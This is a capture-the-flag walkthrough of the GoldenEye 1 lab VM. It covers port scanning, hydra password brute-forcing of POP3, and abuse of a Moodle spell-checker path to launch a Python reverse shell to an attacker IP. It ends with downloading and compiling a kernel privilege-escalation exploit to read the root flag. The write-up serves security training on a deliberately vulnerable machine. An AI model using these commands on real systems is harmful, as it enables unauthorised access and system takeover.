# Golden Eye 1

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/GEv1 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds

```

```
nmap -p- -Pn 192.168.1.116 
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00067s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:0C:29:E4:96:14 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds

```

We can see that there are 2 more unknown port that are on the server.

Let's put the IP on the web browser

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80mU0x_rRluYzvaOvd%2Fimage.png?alt=media\&token=841b48e1-0491-425f-82ef-ca343b96886e)

Let's navigate to `/sev-home`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80n1-lKQk68lc-fl0Y%2Fimage.png?alt=media\&token=85b3aaae-8e17-4cd7-a366-f4147388195b)

Then if we go back to the main page and go to the inspect elements we can see a JavaScript file

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80nl-7jjXW1ZoXJa68%2Fimage.png?alt=media\&token=2f2f2ab5-9639-486e-a453-c03172c08b2d)

We can see there is an encrypted password I copied it and paste it at google search bar then we got this surprisingly

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80uy0R3JkQ3SVWsQ1_%2Fimage.png?alt=media\&token=10f74cf7-da2d-401b-abb2-6eb976b4e960)

Very obvious, the username is boris and we can login.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80vHXpHgFia8G86oGq%2Fimage.png?alt=media\&token=79967fa7-5f2a-4273-90aa-d720bfff6242)

We can see that there is pop3 server running.

If we use nmap to enumerate both of the unknown ports 

```
nmap -sV -p 55006,55007 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 10:28 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00030s latency).

PORT      STATE SERVICE     VERSION
55006/tcp open  ssl/unknown
55007/tcp open  pop3        Dovecot pop3d
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.42 seconds

```

We know that 55007 is running pop3

## Exploitation

### Hydra

Then we can brute force to get the password of `boris` and `natalya`

```
hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

```
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80xtwCV16Ez8yFniDC%2Fimage.png?alt=media\&token=25e086b2-93f2-4a05-bb21-becdc37f06b5)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80yuU-2utL2baG_mjI%2Fimage.png?alt=media\&token=b41784d8-79ba-4763-9549-a7b40961e1d2)

Got the password! we can now login to the pop3 server

```
nc 192.168.1.116 55007
USER boris
PASS secret1!
LIST
RETR 1
RETR 2 
RETR 3
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80zCW_opDG9CuuKJPm%2Fimage.png?alt=media\&token=013fb5ba-f043-4f2d-99b2-5336f1fcaa2f)

Nothing seems to be very interesting here, so we move on to the `natalya`

Doing the same thing as `boris`, we got something pretty interesting here

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M80zlTmCSWD6k1SiO9R%2Fimage.png?alt=media\&token=d4b39f73-4fe3-4714-8a1c-6eb586f4f80b)

We got a credentials and we need to add the server IP to the /etc/hosts and navigate to `severnaya-station.com/gnocertdir`

After doing that, we can go to the browser and navigate to `severnaya-station.com/gnocertdir`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M811SAadFmusruBd4Ey%2Fimage.png?alt=media\&token=a81af0f5-8ef5-406c-ade6-0427338f0da9)

We can login with the credentials he given

Then we can navigate to messages and we can see that the username is `doak`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M8122BvFJdb30jjvy-2%2Fimage.png?alt=media\&token=204bc194-a5d9-4610-ac3d-79aad25d0e5a)

Now we can take the username doak and brute force using hydra again

```
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M813PD_Bt6fulmj6emi%2Fimage.png?alt=media\&token=cc573d51-1491-4b77-99a1-71feb47ba29f)

We got the credentials, we then can go to back to the pop3 server and login 

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M813zpGYh_oMxfLLRoT%2Fimage.png?alt=media\&token=8407c18d-2165-42d2-bbd2-7d56148a59fd)

We got the credentials and we go back to the Moodle and login 

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M814HhBHFsJGSDHwxoQ%2Fimage.png?alt=media\&token=cc02aa2c-9015-4527-ba04-83767c3c553a)

We then go to the private files and we have a s3cret.txt

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M814Sg1yoeCcZSloCWa%2Fimage.png?alt=media\&token=f8c99d55-e0d4-4f07-9a1f-ce34e8a1d1eb)

After cat the file out, we got this

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M815P3HdLucoP26QQ7r%2Fimage.png?alt=media\&token=9826492c-6dd0-4f21-b31e-8f6f95188f68)

We can see that the picture leads to the admin credentials 

We can see that there is a link in the file, if we follow the link,

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M815ZENcv3iJ0UxxbsS%2Fimage.png?alt=media\&token=9784d67b-906c-4485-be3f-e27504134daa)

If we download the picture and use strings command to list out all readable content, we will get this

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M816K4qLuqLDQg-GAm6%2Fimage.png?alt=media\&token=104e62a1-019f-4920-9937-ee158c6a65a6)

We can see that there is a base64 encrypted line.

After decode we got

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M816UX7ooalZz4Vbc1h%2Fimage.png?alt=media\&token=968dbb03-5e6a-4cb5-a8ae-f8bbbcb4283e)

Let's login to the Moodle using the credentials we just got

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M817wXvNDPzY1tJ0qe1%2Fimage.png?alt=media\&token=2ebdab5b-61eb-4047-92c1-12eac1a560fd)

After playing around, I found out that under site administration, Plugins, and Text Editor, there is a TinyMCE HTML editor

We need to change the Spell engine from Google Spell to PSpellShell

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M818Rk730eblkM6kE-E%2Fimage.png?alt=media\&token=ae4becb3-baed-4156-833a-0a5f1143bd5b)

Then, we go to the server and System Path, we can see that there is a Path to aspell section

### Reverse Shell

I tried using netcat but it doesn't work so we change the section to Python reverse shell.

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M818aW4kd6el8xq5cw0%2Fimage.png?alt=media\&token=74d0826f-a121-4c43-bca5-45cd0fa62f47)

Then we set up a listener at our machine 

```
nc -nlvp 4444
```

Then we can go to blog and add new entries

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81AF7hrJhImW8VjWYU%2Fimage.png?alt=media\&token=acc15ef9-6ec5-4d21-ba08-6ec48f77a357)

After that click the spelling check to get the reverse shell

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81AKydMz7PtmiKxd30%2Fimage.png?alt=media\&token=2c2ada5e-8689-44cd-8d37-631dd5c75021)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81AOgAG-vWp-hI6yEp%2Fimage.png?alt=media\&token=e78b4a43-b641-403e-abfa-b83b39150679)

Then we can type a python command 

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

## Privilege Escalation

If we type `uname -a` , we can see that the kernal is out of date

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81BLKhkAMNVFjVxRdT%2Fimage.png?alt=media\&token=73404af3-4e6c-4eb0-9f35-bbb55d250165)

We then can searchsploit the kernal..

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81BSwEeL52L4VB1A7m%2Fimage.png?alt=media\&token=2073a44f-4944-4dff-8216-e8f7d30be083)

After that we can copy to our directory then I tried to transfer the file to the target machine but `gcc` is not available in the target machine but `cc` is available.

So we need to change something in the exploit

Change the `gcc` to `cc`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81BmhYGlszbii6Kljc%2Fimage.png?alt=media\&token=545aca69-37bd-46c7-89ae-0418628c2436)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81BrEMymU7sGNdf-Cx%2Fimage.png?alt=media\&token=5b57bdc2-ad30-4d2e-99f3-ba0a3329e74f)

Then at our machine we can fire up the SimpleHTTPServer using Python

```
python -m SimpleHTTPServer
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81C7814oXEr_fhwcfi%2Fimage.png?alt=media\&token=b6b7fa8a-ad0f-4c39-aa84-4eb186b3c193)

On the target machine navigate to `/tmp` directory and `wget` the file

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81CQpKnEqTqrUGKqUx%2Fimage.png?alt=media\&token=5fdd7d6a-9b65-44ef-a900-10e40b83e1b3)

Then we can type 

```
cc 37292.c -o exploit
chmod +x exploit
./exploit
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81CiBjFhq3U1hcljId%2Fimage.png?alt=media\&token=dac7dc9f-58f5-42c6-bb91-f2082d9997dd)

Navigate to the `/root` and get the `.flag.txt`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81CouHn-8k3kQkM9E5%2Fimage.png?alt=media\&token=637e5873-f46d-4074-9496-bb9f4e634b5b)

Then we can navigate to the URL it provided

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M80kTbEaSQ-8eNc3Ii7%2F-M81D0ltZFjL8VaKGrMZ%2Fimage.png?alt=media\&token=1703ff55-d39d-4b4c-98b8-9da403523071)

Congratulation !